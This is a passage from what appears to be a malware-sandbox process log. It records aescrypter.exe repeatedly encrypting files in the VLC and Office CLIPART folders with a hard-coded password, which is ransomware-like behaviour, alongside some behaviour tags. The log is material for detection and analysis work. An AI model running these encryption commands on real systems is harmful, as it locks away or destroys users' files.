  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1712
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1812
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1092
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:668
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2120
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2456
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2004
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\Folder-48.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\images\Folder-48.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1752
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\Other-48.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\images\Other-48.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:828
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2196
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:868
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1804
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:992
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.xml.aes" "C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2572
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.xml.aes" "C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2324
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist_jstree.xml.aes" "C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist_jstree.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2292
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt.aes" "C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2868
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\status.xml.aes" "C:\Program Files\VideoLAN\VLC\lua\http\requests\status.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2884
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm.xml.aes" "C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2860
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm_cmd.xml.aes" "C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm_cmd.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1876
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\NEWS.txt.aes" "C:\Program Files\VideoLAN\VLC\NEWS.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2764
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\plugins\plugins.dat.aes" "C:\Program Files\VideoLAN\VLC\plugins\plugins.dat" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1188
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\README.txt.aes" "C:\Program Files\VideoLAN\VLC\README.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2096
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\skins\winamp2.xml.aes" "C:\Program Files\VideoLAN\VLC\skins\winamp2.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2604
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\THANKS.txt.aes" "C:\Program Files\VideoLAN\VLC\THANKS.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2776
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099145.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099145.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1476
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099147.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099147.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:380
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099148.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099148.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2708
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099150.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099150.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1672
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099152.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099152.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1604
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099154.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099154.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2824
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099155.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099155.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1432
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099156.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099156.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:776
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099157.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099157.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2668
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099160.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099160.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1988
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099161.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099161.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1196
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099162.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099162.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1664
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099165.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099165.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1740
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099166.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099166.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2408
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099167.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099167.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2092
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099168.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099168.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1624
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099185.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099185.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1324
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099186.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099186.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2232
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099187.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099187.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2280
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099188.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099188.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1576
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099189.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099189.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2592
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099190.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099190.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1564
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099191.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099191.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1140
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101856.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101856.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1800
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101857.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101857.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1528
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101858.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101858.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1908
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101859.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101859.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:684
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101860.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101860.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:572
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101861.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101861.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1948
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101862.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101862.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:604
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101863.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101863.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2552
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101864.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101864.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2080
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101865.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101865.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1804
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101866.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101866.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:992
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101867.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101867.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2164
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0144773.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0144773.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2308
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145168.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145168.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2716
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145212.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145212.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1872
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145272.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145272.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2876
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145361.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145361.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2860
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145373.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145373.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:3048
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145669.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145669.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2956
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145707.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145707.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1188
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145810.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145810.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2760
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145879.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145879.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2656
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145895.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145895.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2652
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145904.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145904.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2644
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0146142.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0146142.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2460
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148309.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148309.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2632
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148757.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148757.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:608
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148798.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148798.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2812
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0149018.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0149018.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2980
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0149118.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0149118.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2948
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0164153.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0164153.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2284
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0174952.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0174952.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2784
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0175361.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0175361.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1432
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0175428.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0175428.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:776
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0177257.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0177257.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2668
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0177806.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0177806.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1420
- C:\ProgramData\local\aescrypter.exe
